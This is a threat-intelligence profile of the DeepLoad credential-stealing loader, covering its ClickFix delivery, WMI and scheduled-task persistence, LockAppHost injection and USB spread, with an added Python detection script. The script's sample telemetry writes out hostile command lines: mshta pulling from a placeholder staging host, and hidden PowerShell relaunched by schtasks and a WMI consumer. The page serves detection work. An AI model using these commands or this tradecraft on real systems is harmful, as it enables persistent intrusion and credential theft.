DeepLoad
DeepLoad is a credential-stealing malware/loader tracked by ReliaQuest and observed targeting enterprise IT environments. It is delivered via the ClickFix social-engineering technique, including fake browser prompts or error pages that trick users into executing malicious PowerShell commands through Windows Run, Windows Terminal, or PowerShell. The infection chain abuses mshta.exe to contact attacker-controlled staging infrastructure and retrieve a heavily obfuscated PowerShell loader. Reporting states the loader contains thousands of meaningless variable assignments, assessed with high confidence by ReliaQuest to be AI-generated obfuscation intended to hinder static analysis and evade detection.
DeepLoad establishes persistence through a scheduled task that re-executes the loader on reboot and through hidden WMI event subscriptions that can silently redeploy the malware after apparent remediation. In at least one observed case, a WMI subscription re-executed the attack three days after a host appeared clean. The malware operates largely filelessly, decrypting payloads in memory via a short XOR routine, using PowerShell Add-Type to compile a temporary C# injector/DLL with randomized filenames, and performing APC-based process injection into LockAppHost.exe, a legitimate Windows lock screen process.
Its primary capability is credential theft. ReliaQuest reported that DeepLoad can collect stored credentials, extract browser passwords, capture newly entered credentials in real time via keylogging, and deploy a malicious browser extension that steals passwords and session tokens as users type them. A credential stealer named filemanager.exe may be dropped and can continue exfiltrating data over its own command-and-control channel even if the primary loader is blocked. DeepLoad was also observed disabling PowerShell command history to reduce forensic visibility.
The campaign was observed spreading to connected USB drives within minutes of infection, writing more than 40 disguised files including fake Chrome, Firefox, and AnyDesk installers or shortcuts, indicating likely propagation beyond the initially infected host. Researchers also observed ClickFix campaigns delivering DeepLoad on Windows systems. High-confidence indicators and artifacts mentioned in the reporting include abuse of mshta.exe, scheduled tasks, WMI event subscriptions, injection into LockAppHost.exe, the dropped stealer filemanager.exe, malicious browser extensions, and USB-borne lure filenames such as ChromeSetup.lnk, Firefox Installer.lnk, and AnyDesk.lnk.
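The behaviours summarized above (mshta.exe pulling a remote loader, a scheduled task and a WMI event consumer that re-launch it, Add-Type compiling a throwaway DLL into Temp, a script host touching LockAppHost.exe, and lure shortcuts landing on a removable drive) are individually noisy but together form a chain worth alerting on. The following is an added example of that correlation, not code from ReliaQuest or Mallory. The event records are constructed, Sysmon-like dictionaries whose field names (`image`, `parent_image`, `cmdline`, `target_image`, `removable`) are an assumption of this example; the staging URL and file paths are placeholders. Only the lure filenames and process names come from the page.

```python
"""Behavioural hunt for a DeepLoad-style ClickFix chain over endpoint telemetry.

Added example. Event shapes are constructed, Sysmon-like records (process
creation, process access, file creation, WMI consumer creation), not real
telemetry from the report the page summarizes.
"""
import re
from typing import Iterable, Optional

# Lure names and the injection target are from the page; everything else here
# (field names, paths, URL) is an assumption of this example.
LURE_FILENAMES = {"chromesetup.lnk", "firefox installer.lnk", "anydesk.lnk"}
INJECTION_TARGET = "lockapphost.exe"
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe")


def _img(event: dict, key: str = "image") -> str:
    """Lower-cased basename of a process image path, or '' if the key is absent."""
    return event.get(key, "").rsplit("\\", 1)[-1].lower()


def rule_mshta_remote(event: dict) -> Optional[str]:
    """ClickFix stager: mshta.exe handed a URL to fetch the obfuscated loader."""
    if event["type"] == "process_create" and _img(event) == "mshta.exe" \
            and re.search(r"https?://", event.get("cmdline", ""), re.I):
        return "mshta.exe fetching remote content"
    return None


def rule_schtask_reexec(event: dict) -> Optional[str]:
    """Scheduled task whose action re-launches a script host (reboot persistence)."""
    cmd = event.get("cmdline", "").lower()
    if event["type"] == "process_create" and _img(event) == "schtasks.exe" \
            and "/create" in cmd and any(h in cmd for h in SCRIPT_HOSTS):
        return "scheduled task re-executing a script host"
    return None


def rule_wmi_subscription(event: dict) -> Optional[str]:
    """Hidden WMI persistence: a CommandLineEventConsumer that runs a script host."""
    if event["type"] == "wmi_consumer" and event.get("consumer_type") == "CommandLineEventConsumer" \
            and any(h in event.get("command", "").lower() for h in SCRIPT_HOSTS):
        return "WMI CommandLineEventConsumer launching a script host"
    return None


def rule_addtype_compile(event: dict) -> Optional[str]:
    """Add-Type compiles C# via csc.exe; a PowerShell parent emitting into Temp is the tell."""
    if event["type"] == "process_create" and _img(event) == "csc.exe" \
            and _img(event, "parent_image") in ("powershell.exe", "pwsh.exe") \
            and "\\temp\\" in event.get("cmdline", "").lower():
        return "PowerShell-driven C# compilation into Temp (Add-Type)"
    return None


def rule_lockapphost_access(event: dict) -> Optional[str]:
    """A script host opening LockAppHost.exe: candidate for APC injection."""
    if event["type"] == "process_access" and _img(event, "target_image") == INJECTION_TARGET \
            and _img(event, "source_image") in SCRIPT_HOSTS:
        return "script host accessing LockAppHost.exe"
    return None


def rule_usb_lures(event: dict) -> Optional[str]:
    """Known lure shortcut names written to a removable volume."""
    if event["type"] == "file_create" and event.get("removable") \
            and event.get("path", "").rsplit("\\", 1)[-1].lower() in LURE_FILENAMES:
        return "installer lure written to removable drive"
    return None


RULES = [rule_mshta_remote, rule_schtask_reexec, rule_wmi_subscription,
         rule_addtype_compile, rule_lockapphost_access, rule_usb_lures]


def hunt(events: Iterable[dict]) -> list:
    """Return (host, finding) pairs for every rule that fires on any event."""
    return [(ev["host"], hit) for ev in events for rule in RULES if (hit := rule(ev))]


def hosts_with_chain(events: Iterable[dict], min_stages: int = 3) -> set:
    """Hosts where at least min_stages distinct stages fired; triage these first."""
    per_host: dict = {}
    for host, finding in hunt(events):
        per_host.setdefault(host, set()).add(finding)
    return {h for h, stages in per_host.items() if len(stages) >= min_stages}


# Constructed sample telemetry (not real events). URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://STAGING-PLACEHOLDER.example/x", "parent_image": r"C:\Windows\explorer.exe"},
    {"host": "WS01", "type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Updater /tr "powershell.exe -w hidden -f C:\Users\Public\l.ps1" /sc onstart'},
    {"host": "WS01", "type": "wmi_consumer", "consumer_type": "CommandLineEventConsumer",
     "command": r"powershell.exe -w hidden -f C:\Users\Public\l.ps1"},
    {"host": "WS01", "type": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /out:C:\Users\u\AppData\Local\Temp\abc123.dll",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"host": "WS01", "type": "process_access", "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\SystemApps\LockApp\LockAppHost.exe"},
    {"host": "WS01", "type": "file_create", "path": r"E:\ChromeSetup.lnk", "removable": True},
    # Benign noise on a second host: an admin backup task and an ordinary USB document.
    {"host": "WS02", "type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Backup /tr "C:\Tools\backup.exe" /sc daily'},
    {"host": "WS02", "type": "file_create", "path": r"E:\report.pdf", "removable": True},
]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
    print("chain hosts:", hosts_with_chain(SAMPLE_EVENTS))
```

Each rule on its own would page an analyst far too often (scheduled tasks and csc.exe are everyday noise); the value is in `hosts_with_chain`, which only surfaces a host once several distinct stages have fired there. In a SIEM the same idea is a per-host count of distinct rule names over a short window rather than a single-event alert.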
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
25 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
It is common for attackers to compromise legitimate websites or create convincing phishing pages and substitute counterfeit CAPTCHA screens for verification prompts that require visitors to perform a series of manual tasks, including executing a command copied to the clipboard.
Execution (5 techniques)
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
These commands typically launch PowerShell, which retrieves and executes remote payloads, thereby enabling the deployment of information stealers and other malicious applications.
Persistence (4 techniques)
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
Privilege Escalation (5 techniques)
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operating system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.
Stealth (10 techniques)
That loader contained “thousands of meaningless variable assignments that resemble routine scripting,” and researchers said this “busy” design was meant to hide the loader’s malicious functionality inside the noise.
To carry out the injection DeepLoad uses a PowerShell feature called Add-Type to generate a temporary Dynamic Link Library (DLL) that is dropped into the compromised computer's Temp directory.
ReliaQuest urged organizations to perform ongoing behavioral analysis of computers on their networks to catch the malware in the act, given that its fileless operations can bypass more traditional static defenses.
The security vendor found the malware writing more than 40 files disguised as Chrome setup files, Firefox installers, AnyDesk shortcuts and other familiar installers, to the USB drive of a compromised host.
ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operating system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.
Through asynchronous procedure call (APC) injection, the loader places shellcode into that process’s memory and triggers execution on resume...
The malware also disables PowerShell command history to cover its own tracks.
The actual logic — a short XOR decryption routine — sits at the bottom and decrypts shellcode in memory, so no decoded payload touches disk.
Credential Access (4 techniques)
A malicious browser extension captures passwords and session tokens as users type them, persisting across sessions until removed.
Researchers have uncovered a new malware strain capable of stealing credentials immediately after gaining a foothold on a victim network, capturing both stored browser passwords and live keystrokes in real time through a standalone stealer and a malicious browser extension.
Lateral Movement (1 technique)
Command and Control (1 technique)
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware family delivered via ClickFix campaigns on Windows systems.
Credential-stealing malware designed to evade detection.
Credential-stealing malware campaign using ClickFix-style lures and a loader with suspected AI-assisted obfuscation to evade security tools. It enables real-time keylogging, persists via backup mechanisms, and can spread to connected USB drives.
DeepLoad is a newly discovered malware targeting enterprise environments. It uses a ClickFix social-engineering lure to trick users into executing a PowerShell command, establishes persistence via scheduled tasks and hidden WMI event subscriptions, fetches obfuscated payloads with mshta.exe, injects shellcode into trusted Windows processes, steals credentials and session tokens, and propagates via USB drives using disguised installer files and fake shortcuts.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.